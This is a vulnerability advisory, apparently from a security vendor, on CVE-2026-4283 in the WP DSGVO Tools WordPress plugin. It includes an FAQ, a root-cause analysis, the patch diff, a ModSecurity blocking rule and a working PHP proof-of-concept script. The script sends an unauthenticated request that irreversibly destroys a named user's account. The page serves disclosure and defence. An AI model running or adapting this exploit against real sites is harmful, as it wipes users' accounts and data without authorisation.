What is CVE-2026-4283?

CVE-2026-4283 is a critical vulnerability in the WP DSGVO Tools (GDPR) plugin for WordPress, affecting versions up to and including 3.1.38. It allows unauthenticated users to permanently destroy non-administrator user accounts by exploiting a missing authorization check in the plugin’s AJAX action.

How does this vulnerability work?

The vulnerability exists in the ‘super-unsubscribe’ AJAX action, which accepts a ‘process_now’ parameter from unauthenticated users. By sending a specially crafted request with a victim’s email address and this parameter, attackers can trigger irreversible account destruction without any authentication.

Who is affected by this vulnerability?

All WordPress sites using the WP DSGVO Tools (GDPR) plugin version 3.1.38 or earlier are affected. Non-administrator user accounts are particularly at risk, as attackers can exploit this vulnerability to destroy these accounts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP DSGVO Tools (GDPR) plugin installed. If it is version 3.1.38 or earlier, your site is at risk. Additionally, review your site’s logs for any suspicious AJAX requests to the ‘admin-ajax.php’ endpoint.

How can I fix this vulnerability?

The vulnerability is patched in version 3.1.39 of the WP DSGVO Tools (GDPR) plugin. Updating to this version or later will mitigate the risk by implementing proper authorization checks for the ‘super-unsubscribe’ AJAX action.

What if I cannot update the plugin immediately?

If immediate updating is not possible, consider temporarily disabling the WP DSGVO Tools (GDPR) plugin to prevent exploitation. Additionally, review user roles and permissions to limit access to sensitive actions until the plugin can be updated.

What does a CVSS score of 9.1 mean?

A CVSS score of 9.1 indicates a critical vulnerability with a high potential impact. This means that successful exploitation can lead to severe consequences, such as complete account destruction and loss of user data.

What are the practical risks of this vulnerability?

The practical risks include the permanent loss of non-administrator user accounts, which can disrupt services and lead to data loss. Users affected by this exploit will lose access to their accounts and associated data, resulting in a denial of service.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can craft a POST request to the vulnerable AJAX endpoint, including the necessary parameters to trigger account destruction. It illustrates the ease of exploitation due to the lack of authorization checks.

What should I do if I suspect exploitation?

If you suspect exploitation of this vulnerability, immediately check your user accounts for any unauthorized changes. Restore affected accounts from backups if possible, and update the plugin to the latest version to prevent further incidents.

Are there any additional security measures I should take?

In addition to updating the plugin, consider implementing security plugins that monitor for suspicious activity and unauthorized access. Regularly review user permissions and conduct security audits to enhance your site’s overall security posture.

Where can I find more information about this vulnerability?

More information about CVE-2026-4283 can be found on the official CVE database, security advisories from the plugin developers, and security blogs that analyze vulnerabilities. Keeping abreast of security updates and advisories is crucial for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 24, 2026

CVE-2026-4283: WP DSGVO Tools (GDPR) <= 3.1.38 – Missing Authorization to Unauthenticated Account Destruction of Non-Admin Users (shapepress-dsgvo)

CVE ID CVE-2026-4283

Plugin shapepress-dsgvo

Severity Critical (CVSS 9.1)

CWE 862

Vulnerable Version 3.1.38

Patched Version 3.1.39

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4283:
This vulnerability is a Missing Authorization flaw in the WP DSGVO Tools (GDPR) WordPress plugin. It allows unauthenticated attackers to trigger the immediate and irreversible destruction of any non-administrator user account. The vulnerability exists in the plugin’s ‘super-unsubscribe’ AJAX action handler. The CVSS score of 9.1 reflects the high impact of complete account destruction.

Atomic Edge research identifies the root cause in the `SPDSGVOSuperUnsubscribeFormAction::run()` method within the file `shapepress-dsgvo/public/shortcodes/super-unsubscribe/unsubscribe-form-action.php`. The vulnerable code accepted a `process_now` parameter from any user. When this parameter was present, the code directly called `$unsubscriber->doSuperUnsubscribe()` without verifying the user’s identity or authorization. The required security nonce was publicly available on any page containing the `[unsubscribe_form]` shortcode, providing no meaningful protection.

Exploitation requires an attacker to send a POST request to the WordPress admin-ajax.php endpoint with the `action` parameter set to ‘super-unsubscribe’. The attacker must include the victim’s email address, set `process_now` to ‘1’, and provide a valid nonce obtained from a public page. The payload triggers the `doSuperUnsubscribe()` method, which randomizes the user’s password, overwrites the username and email, strips all roles, anonymizes comments, and wipes sensitive usermeta.

The patch modifies the authorization logic in `unsubscribe-form-action.php`. It introduces capability checks using `current_user_can(‘manage_options’)`. The `process_now` parameter now only triggers immediate deletion if the request originates from an authenticated administrator (`$is_admin_request`). For unauthenticated or non-admin users, the plugin sets the request status to ‘unconfirmed’ and enforces the intended email confirmation flow. The patch also updates the confirmation logic in `unsubscribe-confirm-action.php` to properly notify administrators and manage request status.

Successful exploitation results in the permanent destruction of the targeted user account. The `doSuperUnsubscribe()` method performs irreversible actions. The user’s password is randomized, their username and email are overwritten with placeholder values, all WordPress roles are removed, associated comments are anonymized, and sensitive usermeta is deleted. This constitutes a complete denial of service for the victim, who loses all access and associated data.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/shapepress-dsgvo/includes/class-sp-dsgvo-ajax-action.php
+++ b/shapepress-dsgvo/includes/class-sp-dsgvo-ajax-action.php
@@ -149,7 +149,7 @@
 		$params = http_build_query(array_merge(array(
 			'action' => (new static())->action), $params),'', '&');

-        error_log($params);
+        //error_log($params);
 		return admin_url('/admin-ajax.php') .'?'. $params;
 	}

--- a/shapepress-dsgvo/public/shortcodes/super-unsubscribe/unsubscribe-confirm-action.php
+++ b/shapepress-dsgvo/public/shortcodes/super-unsubscribe/unsubscribe-confirm-action.php
@@ -1,10 +1,22 @@
 <?php

-Class SPDSGVOSuperUnsubscribeConfirmAction extends SPDSGVOAjaxAction{
-
-    protected $action = 'super-unsubscribe-confirm';
-
-    public function run(){
+Class SPDSGVOSuperUnsubscribeConfirmAction extends SPDSGVOAjaxAction{
+
+    protected $action = 'super-unsubscribe-confirm';
+
+    protected function notifyAdmin($email){
+        if (SPDSGVOSettings::get('su_email_notification') !== '1' || SPDSGVOSettings::get('admin_email') === '') {
+            return;
+        }
+
+        wp_mail(
+            SPDSGVOSettings::get('admin_email'),
+            __('New delete request','shapepress-dsgvo').': '. parse_url(home_url(), PHP_URL_HOST),
+            __('A new delete request from ','shapepress-dsgvo') .' '. $email ."' was confirmed."
+        );
+    }
+
+    public function run(){

         if(!$this->has('token')){
             $this->error(__('No token provided.','shapepress-dsgvo'));
@@ -14,26 +26,30 @@
             'token' => $this->get('token')
         ));

-        if(is_null($unsubscriber)){
-            $this->error(__('Bad token provided','shapepress-dsgvo'));
-        }
-
-        if(SPDSGVOSettings::get('unsubscribe_auto_delete') == '1'){
-            $unsubscriber->doSuperUnsubscribe();
-        }else{
-            $unsubscriber->status = 'confirmed';
-            $unsubscriber->save();
-        }
-
-        $superUnsubscribePage = SPDSGVOSettings::get('super_unsubscribe_page');
-        if($superUnsubscribePage !== '0'){
-            $url = get_permalink($superUnsubscribePage);
-            $this->returnRedirect($url, array(
-                'result' => 'confirmed',
-            ));
-        }
-
-    }
-}
+        if(is_null($unsubscriber)){
+            $this->error(__('Bad token provided','shapepress-dsgvo'));
+        }
+
+        if ($unsubscriber->status === 'unconfirmed') {
+            $this->notifyAdmin($unsubscriber->email);
+
+            if(SPDSGVOSettings::get('unsubscribe_auto_delete') == '1'){
+                $unsubscriber->doSuperUnsubscribe();
+            }else{
+                $unsubscriber->status = 'pending';
+                $unsubscriber->save();
+            }
+        }
+
+        $superUnsubscribePage = SPDSGVOSettings::get('super_unsubscribe_page');
+        if($superUnsubscribePage !== '0'){
+            $url = get_permalink($superUnsubscribePage);
+            $this->returnRedirect($url, array(
+                'result' => $unsubscriber->status === 'done' ? 'confirmed' : 'request_confirmed',
+            ));
+        }
+
+    }
+}

 SPDSGVOSuperUnsubscribeConfirmAction::listen();
--- a/shapepress-dsgvo/public/shortcodes/super-unsubscribe/unsubscribe-form-action.php
+++ b/shapepress-dsgvo/public/shortcodes/super-unsubscribe/unsubscribe-form-action.php
@@ -1,48 +1,58 @@
 <?php

-Class SPDSGVOSuperUnsubscribeFormAction extends SPDSGVOAjaxAction{
-
-    protected $action = 'super-unsubscribe';
-
-    public function run(){
+Class SPDSGVOSuperUnsubscribeFormAction extends SPDSGVOAjaxAction{
+
+    protected $action = 'super-unsubscribe';
+
+    protected function notifyAdmin($email){
+        if (SPDSGVOSettings::get('su_email_notification') !== '1' || SPDSGVOSettings::get('admin_email') === '') {
+            return;
+        }
+
+        wp_mail(
+            SPDSGVOSettings::get('admin_email'),
+            __('New delete request','shapepress-dsgvo').': '. parse_url(home_url(), PHP_URL_HOST),
+            __('A new delete request from ','shapepress-dsgvo') .' '. $email ."' was confirmed."
+        );
+    }
+
+    public function run(){

         if(!empty($_POST['website'])) die(); // anti spam honeypot

         $this->checkCSRF();

-        if(!$this->has('email') || empty($this->get('email', NULL, 'sanitize_email'))){
-            $this->error(__('Please enter an email address.','shapepress-dsgvo'));
-        }
+	    $email = $this->get('email', null, 'sanitize_email');
+
+	    if (!$email || !is_email($email)) {
+		    $this->error(__('Please enter a valid email address.', 'shapepress-dsgvo'));
+	    }

         if(!$this->has('dsgvo_checkbox') || $this->get('dsgvo_checkbox') !== '1'){
             $this->error(__('The GDPR approval is mandatory.','shapepress-dsgvo'));
         }

-        $unsubscriber = SPDSGVOUnsubscriber::insert(array(
-            'first_name' => $this->get('first_name'),
-            'last_name'  => $this->get('last_name'),
-            'email'      => $this->get('email', NULL, 'sanitize_email'),
-            'process_now'=> $this->get('process_now'),
-            'dsgvo_accepted' => $this->get('dsgvo_checkbox')
-        ));
-
-        if (SPDSGVOSettings::get('su_email_notification') === '1'
-            && SPDSGVOSettings::get('admin_email') !== ''
-            && $this->has('process_now') == false)
-        {
-            // Send Email
-            wp_mail(SPDSGVOSettings::get('admin_email'),
-                __('New delete request','shapepress-dsgvo').': '. parse_url(home_url(), PHP_URL_HOST),
-                __('A new subject access request from ','shapepress-dsgvo') .' '.$this->get('email')."' was made.");
-        }
-
-        if($this->has('process_now')){
-            $unsubscriber->doSuperUnsubscribe();
-        }
-
-        if($this->has('is_admin')){
-            $this->returnBack();
-        }
+	    $is_admin_request = $this->has('process_now') && current_user_can('manage_options');
+        $is_privileged_request = $this->has('is_admin') && current_user_can('manage_options');
+        $requires_email_confirmation = !$is_privileged_request;
+
+        $unsubscriber = SPDSGVOUnsubscriber::insert(array(
+            'first_name' => $this->get('first_name'),
+            'last_name'  => $this->get('last_name'),
+            'email'      => $this->get('email', NULL, 'sanitize_email'),
+            'process_now'=> $this->get('process_now'),
+            'dsgvo_accepted' => $this->get('dsgvo_checkbox'),
+            'status'     => $requires_email_confirmation ? 'unconfirmed' : 'pending',
+        ));
+
+        if ($is_privileged_request && $this->has('process_now') == false) {
+            $this->notifyAdmin($email);
+        }
+
+	    if ($is_admin_request) {
+		    $unsubscriber->doSuperUnsubscribe();
+		    $this->returnBack();
+	    }

         $superUnsubscribePage = SPDSGVOSettings::get('super_unsubscribe_page');
         if($superUnsubscribePage !== '0'){
--- a/shapepress-dsgvo/public/shortcodes/super-unsubscribe/unsubscribe-form.php
+++ b/shapepress-dsgvo/public/shortcodes/super-unsubscribe/unsubscribe-form.php
@@ -18,9 +18,13 @@

             <p class="sp-dsgvo us-success-message"><?php _e('Request sent successfully. You will receive an email in a few minutes.','shapepress-dsgvo')?></p>

-        <?php elseif(isset($_REQUEST['result']) && sanitize_text_field($_REQUEST['result']) === 'confirmed'): ?>
-
-			<p class="sp-dsgvo us-success-message"><?php _e('Request successfully completed. Your data has been completely deleted.','shapepress-dsgvo')?></p>
+        <?php elseif(isset($_REQUEST['result']) && sanitize_text_field($_REQUEST['result']) === 'request_confirmed'): ?>
+
+            <p class="sp-dsgvo us-success-message"><?php _e('Request confirmed successfully. Your delete request will be processed shortly.','shapepress-dsgvo')?></p>
+
+        <?php elseif(isset($_REQUEST['result']) && sanitize_text_field($_REQUEST['result']) === 'confirmed'): ?>
+
+			<p class="sp-dsgvo us-success-message"><?php _e('Request successfully completed. Your data has been completely deleted.','shapepress-dsgvo')?></p>

         <?php else: ?>
         <div class="sp-dsgvo sp-unsubsribe-form">
@@ -84,4 +88,4 @@
     return ob_get_clean();
 }

-add_shortcode('unsubscribe_form', 'SPDSGVOUnsubscribeShortcode');
 No newline at end of file
+add_shortcode('unsubscribe_form', 'SPDSGVOUnsubscribeShortcode');
--- a/shapepress-dsgvo/sp-dsgvo.php
+++ b/shapepress-dsgvo/sp-dsgvo.php
@@ -16,7 +16,7 @@
  * Plugin Name:       WP DSGVO Tools (GDPR)
  * Plugin URI:        https://legalweb.io
  * Description:       WP DSGVO Tools (GDPR) help you to fulfill the GDPR (DGSVO)  compliance guidance (<a target="_blank" href="https://ico.org.uk/for-organisations/data-protection-reform/overview-of-the-gdpr/">GDPR</a>)
- * Version:           3.1.38
+ * Version:           3.1.39
  * Author:            legalweb
  * Author URI:        https://www.legalweb.io
  * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
@@ -28,7 +28,7 @@
     die();
 }

-define('sp_dsgvo_VERSION', '3.1.38');
+define('sp_dsgvo_VERSION', '3.1.39');
 define('sp_dsgvo_NAME', 'sp-dsgvo');
 define('sp_dsgvo_PLUGIN_NAME', 'shapepress-dsgvo');
 define('sp_dsgvo_LEGAL_TEXTS_MIN_VERSION', '1579021814');

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-4283
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10004283,phase:2,deny,status:403,chain,msg:'CVE-2026-4283 via WP DSGVO Tools super-unsubscribe AJAX',severity:'CRITICAL',tag:'CVE-2026-4283',tag:'WordPress',tag:'Plugin/WP-DSGVO-Tools'"
  SecRule ARGS_POST:action "@streq super-unsubscribe" "chain"
    SecRule ARGS_POST:process_now "@streq 1" "chain"
      SecRule &ARGS_POST:is_admin "@eq 0"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4283 - WP DSGVO Tools (GDPR) <= 3.1.38 - Missing Authorization to Unauthenticated Account Destruction of Non-Admin Users

<?php

$target_url = 'https://vulnerable-wordpress-site.com';
$victim_email = 'victim@example.com';
$nonce = '1234567890abcdef'; // This must be extracted from a page with the [unsubscribe_form] shortcode

// Build the POST payload for the vulnerable AJAX endpoint
$post_data = array(
    'action' => 'super-unsubscribe',
    'email' => $victim_email,
    'process_now' => '1',
    'dsgvo_checkbox' => '1',
    '_wpnonce' => $nonce
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // Disable for testing only

// Execute the request to trigger account destruction
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check the response
if ($http_code == 200) {
    echo "Exploit request sent. Check if the account for $victim_email has been destroyed.n";
    echo "Response: $responsen";
} else {
    echo "Request failed with HTTP code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2026-4283?
Overview of the vulnerability
CVE-2026-4283 is a critical vulnerability in the WP DSGVO Tools (GDPR) plugin for WordPress, affecting versions up to and including 3.1.38. It allows unauthenticated users to permanently destroy non-administrator user accounts by exploiting a missing authorization check in the plugin’s AJAX action.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability exists in the ‘super-unsubscribe’ AJAX action, which accepts a ‘process_now’ parameter from unauthenticated users. By sending a specially crafted request with a victim’s email address and this parameter, attackers can trigger irreversible account destruction without any authentication.
Who is affected by this vulnerability?
Identifying impacted users
All WordPress sites using the WP DSGVO Tools (GDPR) plugin version 3.1.38 or earlier are affected. Non-administrator user accounts are particularly at risk, as attackers can exploit this vulnerability to destroy these accounts.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the WP DSGVO Tools (GDPR) plugin installed. If it is version 3.1.38 or earlier, your site is at risk. Additionally, review your site’s logs for any suspicious AJAX requests to the ‘admin-ajax.php’ endpoint.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 3.1.39 of the WP DSGVO Tools (GDPR) plugin. Updating to this version or later will mitigate the risk by implementing proper authorization checks for the ‘super-unsubscribe’ AJAX action.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider temporarily disabling the WP DSGVO Tools (GDPR) plugin to prevent exploitation. Additionally, review user roles and permissions to limit access to sensitive actions until the plugin can be updated.
What does a CVSS score of 9.1 mean?
Understanding the severity rating
A CVSS score of 9.1 indicates a critical vulnerability with a high potential impact. This means that successful exploitation can lead to severe consequences, such as complete account destruction and loss of user data.
What are the practical risks of this vulnerability?
Consequences of exploitation
The practical risks include the permanent loss of non-administrator user accounts, which can disrupt services and lead to data loss. Users affected by this exploit will lose access to their accounts and associated data, resulting in a denial of service.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept provided shows how an attacker can craft a POST request to the vulnerable AJAX endpoint, including the necessary parameters to trigger account destruction. It illustrates the ease of exploitation due to the lack of authorization checks.
What should I do if I suspect exploitation?
Response to potential attacks
If you suspect exploitation of this vulnerability, immediately check your user accounts for any unauthorized changes. Restore affected accounts from backups if possible, and update the plugin to the latest version to prevent further incidents.
Are there any additional security measures I should take?
Enhancing overall security
In addition to updating the plugin, consider implementing security plugins that monitor for suspicious activity and unauthorized access. Regularly review user permissions and conduct security audits to enhance your site’s overall security posture.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-4283 can be found on the official CVE database, security advisories from the plugin developers, and security blogs that analyze vulnerabilities. Keeping abreast of security updates and advisories is crucial for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations